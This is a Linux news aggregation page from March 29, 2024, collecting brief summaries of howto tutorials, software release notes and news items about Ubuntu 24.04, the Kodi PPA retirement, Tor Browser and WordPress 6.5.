☛ Getting_Started_With_Nix_Package_Manager:_A_Beginner’s Guide_2024⠀⇛ * § idroot⠀➾ o ⚓ ID Root ☛ How_To_Install_NumPy_on_openSUSE⠀⇛ In this tutorial, we will show you how to install NumPy on openSUSE. NumPy is a fundamental library for scientific computing and data analysis in Python. It provides support for large, multi-dimensional arrays and matrices, along with a vast collection of mathematical functions to operate on these arrays efficiently. o ⚓ ID Root ☛ How_To_Install_Scala_on_Fedora_39⠀⇛ In this tutorial, we will show you how to install Scala on Fedora 39. Scala is a modern, multi-paradigm programming language that combines the best features of object-oriented and functional programming. o ⚓ ID Root ☛ How_To_Install_PgHero_on_Ubuntu_22.04_LTS⠀⇛ In this tutorial, we will show you how to install PgHero on Ubuntu 22.04 LTS. For those of you who didn’t know, PostgreSQL is a powerful open-source relational database management system known for its reliability, scalability, and performance. However, optimizing PostgreSQL performance can be a complex task, requiring careful monitoring and analysis of various metrics. o ⚓ ID Root ☛ How_To_Install_Zabbix_on_Fedora_39⠀⇛ In this tutorial, we will show you how to install Zabbix on Fedora 39. Zabbix is a powerful open-source monitoring solution designed to keep track of IT infrastructure components such as networks, servers, virtual machines, and cloud services. * ⚓ Vitux ☛ How_to_Install_WildFly_JAVA_Application_Server_on_Ubuntu 22.04⠀⇛ WildFly, formerly JBoss, is a free and open-source application server that helps you build and deploy Java web applications. It's written in Java and compliant with Java EE (Enterprise Edition) specifications. WildFly was created by JBoss but is now developed by RedHat. * ⚓ Vitux ☛ How_to_install_PHP_7.2/7.3/7.4_on_Ubuntu_22.04⠀⇛ PHP is a free, open source and one of the most commonly used server-side programming languages. It is used for the development of dynamic and responsive websites. * § howtoforge⠀➾ o ⚓ HowTo Forge ☛ How_to_Install_sFTPGo_on_Rocky_Linux⠀⇛ sFTPGo is a highly configurable SFTP server with additional secure protocols such as HTTP/S, FTP/S, and WebDAV support. It allows you to create FTP servers with several backends, such as local filesystems, and third- party storage providers, such as Amazon S3, Surveillance Giant Google Storage Engine, and Microsoft trap Azure Blog Storage. o ⚓ HowTo Forge ☛ How_to_Install_Monit_Monitoring_Tool_on_Ubuntu 22.04⠀⇛ Monit is an open-source monitoring tool that can be used to monitor servers. This tutorial will show you how to install and configure the Monit monitoring tool on Ubuntu 22.04. o ⚓ HowTo Forge ☛ How_to_Install_OTRS_Ticketing_System_on_Ubuntu 22.04⠀⇛ OTRS is a free, open-source, and one of the most popular service management or Ticket Request System applications to track general IT-related issues. This post will explain how to install OTRS on an Ubuntu 22.04 server. o ⚓ HowTo Forge ☛ How_to_Install_Munin_Monitoring_Tool_on_Ubuntu 22.04⠀⇛ Munin is a free, open-source system and powerful network monitoring tool for Linux. This tutorial will show you how to install the Munin monitoring tool on Ubuntu 22.04. o ⚓ HowTo Forge ☛ How_to_Install_LibreNMS_Monitoring_Tool_on_Ubuntu 22.04⠀⇛ LibreNMS is a free and open-source monitoring tool written in PHP/MySQL/SNMP. This guide will teach you how to install and configure the LibreNMS monitoring tool on the latest Ubuntu 22.04 server. This tutorial will cover some additional configurations of the LEMP Stack for the LibreNMS installation. o ⚓ HowTo Forge ☛ How_to_Install_Rancher_Kubernetes_Panel_on_Ubuntu 22.04⠀⇛ Rancher is a free, open-source, and multi-cluster orchestration platform that allows organizations to deploy containers in a production environment. This tutorial will show you how to install the Rancher Kubernetes container management platform on Ubuntu 22.04. * ⚓ LinuxConfig ☛ How_to_Install_and_Switch_Java_Versions_on_Ubuntu_Linux⠀⇛ * ⚓ Linuxiac ☛ How_to_Set_up_Caddy_as_a_Reverse_Proxy⠀⇛ Master traffic redirection with our Caddy tutorial. Set up Caddy as a reverse proxy and quickly streamline access to your services. * ⚓ Simos Xenitellis ☛ Simos_Xenitellis:_How_to_run_an_Incus_VM_inside_an Incus_VM_(nested_virtualization)⠀⇛ Incus is a manager for virtual machines (VM) and system containers. There is also an_Incus_support_forum. A virtual machine (VM) is an instance of an operating system that runs on a computer, along with the main operating system. A virtual machine uses hardware virtualization features for the separation from the main operating system. With virtual machines, the full operating system boots up in them. A system container is an instance of an operating system that also runs on a computer, along with the main operating system. A system container, instead, uses security primitives of the GNU/Linux kernel for the separation from the main operating system. You can think of system containers as software virtual machines. System containers reuse the running GNU/Linux kernel of the host, therefore you can only have GNU/Linux system containers, any_GNU/Linux_distribution. ䷩ 𝚕𝚒𝚗𝚎 3504 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.2.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/today_s_howtos.2.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ today's howtos⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Ubuntu Handbook ☛ How_to_Install_&_Use_TeamViewer_Free_in_Ubuntu 24.04⠀⇛ This is a step by step beginner’s guide shows how to install and use TeamViewer in Ubuntu 24.04 Desktop. TeamViewer is a popular German remote desktop access and remote control software that works in Linux, Windows, MacOS, Android, and iOS/ iPadOS. * ⚓ Install_Cockpit_Flatpak_Client_on_Fedora_40_KDE_(NIghtly_build_03/27/ 24)⠀⇛ Cockpit Client provides a graphical interface to your servers, containers, and virtual machines. Connections are made over SSH, using the SSH configuration of the local user (including aliases, known hosts, key files, hardware tokens, etc). * ⚓ Make Tech Easier ☛ How_to_Create_Your_Own_Caddy_Webserver_in_Linux⠀⇛ Caddy is a powerful, yet easy-to-use webserver for Linux. Learn how you can use it for hosting websites and proxies in Ubuntu today. ䷩ 𝚕𝚒𝚗𝚎 3550 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/today_s_howtos.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/today_s_howtos.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ today's howtos⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Ubuntu Pit ☛ 95_Best_GNU/Linux_Monitoring_Tools_for_SysAdmin:_An_All- in-One_List⠀⇛ There are many GNU/Linux Monitoring Tools available in the market, including open source software, third-party solutions, and homemade scripts run via cron. Each has its advantages and disadvantages. It’s difficult to find the best GNU/Linux monitoring tools because their purpose and usage vary from user to user and from infrastructure to infrastructure. * ⚓ H2S Media ☛ Install_XAMPP_on_Ubuntu_22.04_LTS_Jammy_Linux⠀⇛ Learn the commands to install XAMPP on Ubuntu 22.04 LTS Jammy JellyFish GNU/Linux using the terminal for setting up the Apache web server and MySQL environment quickly. With the free software collection XAMPP, preconfigured web servers based on Apache can be conveniently set up. * ⚓ TechTea ☛ Adding_Star_Rankings_to_my_Reviews⠀⇛ Good news is Alfred Genkin posted a nice accessible way to create star reviews and posted it to CSS-Tricks back before Digital Ocean stopped using the site. It just uses HTML and CSS, no JavaScript or image shenanigans. It uses the normal Unicode star symbol and applies a gradient over it so you have access to fractional scores. It also uses an aria-label so in theory it is accessible via screen readers and other accessibility tools. * ⚓ University of Toronto ☛ The_effects_of_silences_(et_al)_in_Prometheus Alertmanager⠀⇛ Prometheus Alertmanager has various features that make it 'silence' alerts. Alerts can be inhibited by other alerts, they can be explicitly silenced, and a route can be muted at certain times or only active at certain times. The Alertmanager documentation generally describes all of these as "suppressing notifications" or causing a route to "not send any notifications". However, this limited description is what I would call under-specified, because there are some questions to ask about exactly what happens when you 'silence' alerts. As of Alertmanager 0.27.0, its actual behavior is somewhat complex and definitely hard to understand. * ⚓ HowTo Forge ☛ How_to_Install_OTRS_Ticketing_System_on_Ubuntu_22.04⠀⇛ OTRS is a free, open-source, and one of the most popular service management or Ticket Request System applications to track general IT-related issues. It is written in Perl and supports several databases including, PostgreSQL, MySQL, etc. It provides a central point of contact for users, customers, IT personnel, IT services, and any external organizations. It offers a rich set of features, making it the best choice for help desks, call centers, and IT service management. This post will explain how to install OTRS on an Ubuntu 22.04 server. ䷩ 𝚕𝚒𝚗𝚎 3638 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/today_s_leftovers.1.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/today_s_leftovers.1.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ today's leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * § Applications⠀➾ o ⚓ Document Foundation ☛ Joint_release_of_LibreOffice_24.2.2 Community_and_LibreOffice_7.6.6_Community⠀⇛ Today the Document Foundation releases LibreOffice 24.2.2 Community [1] and LibreOffice 7.6.6 Community [2], both minor releases that fix bugs and regressions to improve quality and interoperability for individual productivity. * § K Desktop Environment/KDE SC/Qt⠀➾ o ⚓ Kubuntu,_KDE_Report._In_Loving_Memory_of_my_Son.⠀⇛ As many of you know, I lost my beloved son March 9th. This has hit me really hard, but I am staying strong and holding on to all the wonderful memories I have. He grew up to be an amazing man, devoted christian and wonderful father. He was loved by everyone who knew him and will be truly missed by us all. I have had folks ask me how they can help. He left behind his 7 year old son Mason. * § Audiocasts/Shows⠀➾ o ⚓ The BSD Now Podcast ☛ BSD_Now_552:_The_Laptop_Sparc⠀⇛ Setup diskless booting of Raspberry Pi, TrueNAS abandons FreeBSD, SPARCbook 3000ST: The coolest 90s laptop, Sparkbook Teardown, SSH over HTTPS, Keycloak Identity and Access Management on FreeBSD, Ford Aerospace and BSD Unix, and more * § Events⠀➾ o ⚓ Bogomil_Shopov_-_Bogo:_Dors/Cluc_and_DevConf.cz:_Two_open_source events_worth_visiting⠀⇛ I hit 10k reads (posted on three platforms) on my article about_the_three_events_you_should_visit_in_Bulgaria focused on Free and open-source software (FOSS). I decided to expand your knowledge with two more that I can recommend. I know that 10k hits are nothing, but I am proud of the results for such a niche topic. * § Games⠀➾ o ⚓ Boiling Steam ☛ New_Steam_Games_with_Native_GNU/Linux_Clients, including_Slice_&_Dice_-_2024-03-27_Edition⠀⇛ Between 2024-03-20 and 2024-03-27 there were 32 New Steam games released with Native GNU/Linux clients. For reference, during the same time, there were 392 games released for backdoored Windows on Steam, so the GNU/ Linux versions represent about 8.2 % of total released titles. There’s not a lot going on in this week, but Slice & Dice is another outlier that builds on the roguelike genre with yet another different take involving dice in new ways. Here’s a quick pick of all the things you might want to check: [...] o ⚓ Hackaday ☛ Homebrew_GPU_Tackles_Quake⠀⇛ Have you ever wondered how a GPU works? Even better, have you ever wanted to make one? [Dylan] certainly did, because he made FuryGPU — a fully custom graphics card capable of playing Quake at over 30 frames per second. ䷩ 𝚕𝚒𝚗𝚎 3742 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/today_s_leftovers.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/today_s_leftovers.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ today's leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * § MakuluLinux⠀➾ o ⚓ MakuluLinux_X_–_What_is_it_?⠀⇛ * § Open Access/Content⠀➾ o ⚓ The Hindu ☛ Tulu_Wikipedia_more_than_doubles_in_size_in_seven years⠀⇛ Tulu Wikipedia, which can be accessed at http:// tcy.wikipedia.org, was in incubation for about eight years since 2008 before it went live. It was the 23rd Indian language Wikipedia to achieve this distinction. Presently Tulu Wikipedia has 11,434 pages with 7,61,224 words. A non-scheduled language, Tulu is spoken commonly and prominently in Dakshina Kannada district and southern parts of Udupi district in Karnataka and northern parts of Kasaragod district in Kerala. Tulu speakers are spread all over India and abroad. * § Graphics Stack⠀➾ o ⚓ GamingOnLinux ☛ SDL_3_will_prefer_Wayland_Over_X11,_if_certain protocols_are_available⠀⇛ Less than a week ago, SDL (Simple DirectMedia Layer) developers restarted the discussion regarding whether Wayland should be configured as the preferred over X11, and a PR was made to revert a commit that set Wayland as preferred due to issues with needing fifo-v1 and commit- timing-v1 protocols. This was briefly touched on in our recent SDL 3 article. * § SUSE/OpenSUSE⠀➾ o ⚓ OpenSUSE ☛ openSUSE_Tumbleweed_Monthly_Update_-_March⠀⇛ Before getting in the package updates, know that this blog aims to provide readers an overview of the key changes, improvements and issues addressed in openSUSE rolling release throughout the month. Should readers desire a more frequent amount of information about snapshot updates, readers are encouraged to subscribe to the openSUSE Factory mailing list. * § Applications⠀➾ o ⚓ Linux Links ☛ chess-tui_–_text-based_chess_game⠀⇛ There are many open source chess clients for Linux. What's unusual about chess-tui is that the program has no fancy graphics. ䷩ 𝚕𝚒𝚗𝚎 3829 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Top_Free_and_Best_Free_Open_Source_Podcasts_and_Crystal_Web_Fra.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Top_Free_and_Best_Free_Open_Source_Podcasts_and_Crystal_Web_Fra.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Top Free and Best Free Open Source Podcasts and Crystal Web Frameworks⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Rianne Schestowitz on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇programming_⦈_ * ⚓ 8_Top_Free_and_Open_Source_Crystal_Web_Frameworks⠀⇛ Crystal is a general-purpose, concurrent, multi-paradigm, object-oriented programming language. With syntax heavily inspired by the language Ruby, it is a compiled language with built-in static type-checking, but specifying the types of variables or method arguments is generally unneeded. This adds the benefit of a shallower learning curve. Here’s our recommended free and open source web frameworks for Crystal captured in a legendary LinuxLinks’ chart. Only free and open source software is eligible for inclusion here. * ⚓ Best_Free_and_Open_Source_Alternatives_to_Apple_Podcasts⠀⇛ There are many things to admire about Apple’s hardware and software. Apple make great looking (albeit expensive) hardware. Over the years key successes include the iPhone, iPad, iPod, and the MacBook Air. The company designs its own hardware and software. This gives them the power to make an operating system and suite of apps that are tailor-made and optimized for their hardware. Apple also operates the Apple Music and Apple TV media distribution platforms. Apple Podcasts is an audio streaming service and media player application for playing podcasts. Podcasts is proprietary software. We recommend the best free and open source software. ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⢿⡿⣿⣟⣛⣋⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡏⠀⠀⠀⠀⠀⠉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⡿⠿⠻⠿⢿⣜⣣⣿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⢿⣿⣿⣿⣿⣿⣿⡿⠿⠿⠿⠇⠀⠀⠀⠀⠀⠀⣿⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣶⣣⣿⣕⣿⡏⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣿ ⣿⣿⡇⠀⠀⠀⢸⠿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⠟⡟⣠⡄⠀⠀⠀⡶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣏⣯⢍⣹⡏⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿ ⣿⣿⣷⣲⣶⢶⣖⠰⡻⠿⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣯⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⢸⣟⣿⣿⣽⣛⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⡿⠿⣿⡟⢻⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢈⣿⣿⣿⣿ ⣿⣿⣿⣶⣦⣾⡷⠩⢳⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣽⣿⣿⣿⣿⣿⣦⣤⣤⣤⡤⡠⣠⣤⣼⣿⣿⣯⠉⠉⠀⢸⣿⣿⡇⣿⣿⣿⣿⣿⣿⣿⡟⡟⠿⠿⠿⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣽⣿⣿⣿⣿⣿⣿⣿⣿⠏⠀⠸⠇⢸⣿⠿⣿⣿⣿⣿⡇⠀⠀⠀⠀⣿⣿⣿⣿⣿⣿⣿⣷⠆⠀⠈⠙⣇⣀⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⡇⢸⠸⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡤⠀⠒⠛⢻⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠘⠓⢀⣻⣿⡀⠀⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⡏⣿⠀⡇⢼⣿⣿⣿⣿⣿⣇⠀⠀⠀⠀⠀⠀⢐⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⠛⠛⠛⠛⠛⢛⠛⢛⠛⠛⡛⠛⡿⠹⡟⠙⢛⠟⠛⠙⠛⠛⡛⡛⠛⡛⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣾⣿⣿⣷⣾⣿⣿⣿⣿⣿⣿⣿⣶⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿ ䷩ 𝚕𝚒𝚗𝚎 3899 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Tor_Browser_13_5a6_is_Out_and_Mozilla_is_Rogue.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Tor_Browser_13_5a6_is_Out_and_Mozilla_is_Rogue.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Tor Browser 13.5a6 is Out and Mozilla is Rogue⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Tor ☛ New_Alpha_Release:_Tor_Browser_13.5a6⠀⇛ Tor Browser 13.5a6 is now available from the Tor Browser download page and also from our distribution directory. This version includes important security updates to Firefox. * ⚓ Techdirt ☛ Mozilla_Drops_New_Privacy_Partner_After_CEO_Found_Tethered To_Data_Brokers⠀⇛ Last month we noted how Mozilla had launched a new privacy protection tool dubbed Mozilla Monitor Plus. According to Mozilla, the new service scours the web for your personal information at over 190 sites where brokers sell information they’ve gathered from online sources like social media sites, apps, and browser trackers. ䷩ 𝚕𝚒𝚗𝚎 3938 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Ubuntu_24_04_Swaps_Cheese_for_GNOME_Snapshot_and_Ubuntu_in_the_.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Ubuntu_24_04_Swaps_Cheese_for_GNOME_Snapshot_and_Ubuntu_in_the_.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Ubuntu 24.04 Swaps Cheese for GNOME Snapshot and Ubuntu in the Wild⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ OMG Ubuntu ☛ Ubuntu_24.04_Swaps_Cheese_for_GNOME_Snapshot⠀⇛ Ubuntu 24.04 is switching its default webcam app from Cheese to Snapshot, a modern GTK4/libadwaita camera tool that’s part of the GNOME Core Apps set. Cheese has been part of Ubuntu’s default software lineup since 2010, having first been added in the Ubuntu 9.10 Netbook Remix owing to the rise of diminutive, underpowered laptops that included dark, dire 0.3MP webcams (webcams weren’t super common in cheap laptops prior to this). * ⚓ OMG Ubuntu ☛ Ubuntu_in_the_Wild:_Distro_Glimpsed_in_Nature_Film ‘Nocturnes’⠀⇛ It’s been a little while since the last #UbuntuintheWild spot but this one feels like a fitting return given it’s quite literally in the wild! The wilds of the Eastern Himalayan forests, in fact. Nature documentary Nocturnes, directed and produced by Anirban Dutta and Anupama Srinivasan, follows scientists as they undertake a research trop deep in to these dense, fertile forests to monitor, assess, and learn more about the lives of hawk moths. ䷩ 𝚕𝚒𝚗𝚎 3981 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Ubuntu_Team_Kodi_PPA_Officially_Retired.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Ubuntu_Team_Kodi_PPA_Officially_Retired.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Ubuntu Team-Kodi PPA Officially Retired⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024, updated Mar 29, 2024 The Linux world is shifting slowly to packaged deployments and containers, and so, going forward, the team is looking to utilise Flatpak to hopefully give Linux users a similar, but more maintainable, "pure" Kodi application. We believe this will also allow us to provide greater access from more distributions than the PPA was ever able to. Read_on More Updates: * ⚓ The_'pure'_version_of_Kodi_for_Ubuntu_Linux_is_dead⠀⇛ Team Kodi, which has long provided Personal Package Archives (PPA) for Ubuntu users seeking up-to-date and undiluted versions of the hugely popular Kodi media player, has announced the retirement of the service. This decision was apparently made due to the high maintenance overhead associated with its upkeep. As the Linux world gradually transitions towards packaged deployments and containers, The Kodi Foundation says it is planning to use Flatpak for future applications. This move will not only provide a more maintainable "pure" Kodi application, but also extend its accessibility to more distributions than the PPA ever could. * ⚓ Kodi_Moves_to_Flatpak_for_Linux_Installations⠀⇛ Slowly but surely, the Linux ecosystem is switching to packaged software bundles, like Snap and Flatpak. The Kodi media center project has announced it will no longer distribute installations or updates through the Team Kodi PPA, instead using Flatpak as its primary software repository on Linux. Personal Package Archives, or PPAs, are software repositories intended for Ubuntu and derivative distros. While Kodi is freely available in the official repositories for Ubuntu-based distros, the PPA provided more frequent updates and a Kodi experience that aligned with the developers' intentions. Flatpak is an acceptable replacement for PPA, and it should provide greater access to Kodi installations on non-Ubuntu distros. However, it will take time to get Flatpak up to speed with the old PPA system. Nightlies and other pre-release builds won't be provided through Flatpak at this time. Linuxiac: * ⚓ Team_Kodi_Announces_Retirement_of_Their_Ubuntu_PPA⠀⇛ In a surprising turn of events for Ubuntu users and Kodi enthusiasts alike, the official Team Kodi Personal Package Archive (PPA) has been officially retired. For years, the Team Kodi PPA has been the go-to source for Ubuntu users seeking the latest and most unmodified Kodi media center software versions. The decision to retire the PPA comes in response to the evolving landscape of Linux software deployment, with a noticeable shift towards packaged deployments and containers. However, every end is the beginning of something new. In this case, Team Kodi is embracing Flatpak as a technology that promises a more streamlined and efficient approach to software delivery. This shift is not just a change but an opportunity to enhance the Kodi experience for a wider range of Linux distributions. How-To Geek: * ⚓ Kodi_Moves_to_Flatpak_for_Linux_Installations⠀⇛ Slowly but surely, the Linux ecosystem is switching to packaged software bundles, like Snap and Flatpak. The Kodi media center project has announced it will no longer distribute installations or updates through the Team Kodi PPA, instead using Flatpak as its primary software repository on Linux. Personal Package Archives, or PPAs, are software repositories intended for Ubuntu and derivative distros. While Kodi is freely available in the official repositories for Ubuntu-based distros, the PPA provided more frequent updates and a Kodi experience that aligned with the developers' intentions. Flatpak is an acceptable replacement for PPA, and it should provide greater access to Kodi installations on non-Ubuntu distros. However, it will take time to get Flatpak up to speed with the old PPA system. Nightlies and other pre-release builds won't be provided through Flatpak at this time. ䷩ 𝚕𝚒𝚗𝚎 4105 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/WordPress_6_5_Release_Candidate_4.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/WordPress_6_5_Release_Candidate_4.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ WordPress 6.5 Release Candidate 4⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ WordPress ☛ WordPress_6.5_Release_Candidate_4⠀⇛ WordPress 6.5 RC4 is ready for download and testing. Reaching this phase of the release cycle is an important milestone. Check out what's coming in this release and how to get involved with the open source project. * ⚓ Linuxiac ☛ WordPress_Announces_Last-Minute_Delay_to_6.5_Release⠀⇛ The WordPress 6.5 release was delayed by one week due to font storage revamp and critical bug fixes. The new date is scheduled for April 2. ╘══════════════════════════════════════════════════════════════════════════════╛ ¶ Lines in total: 4139 ➮ Generation completed at 02:50, i.e. 21 seconds to (re)generate ⟲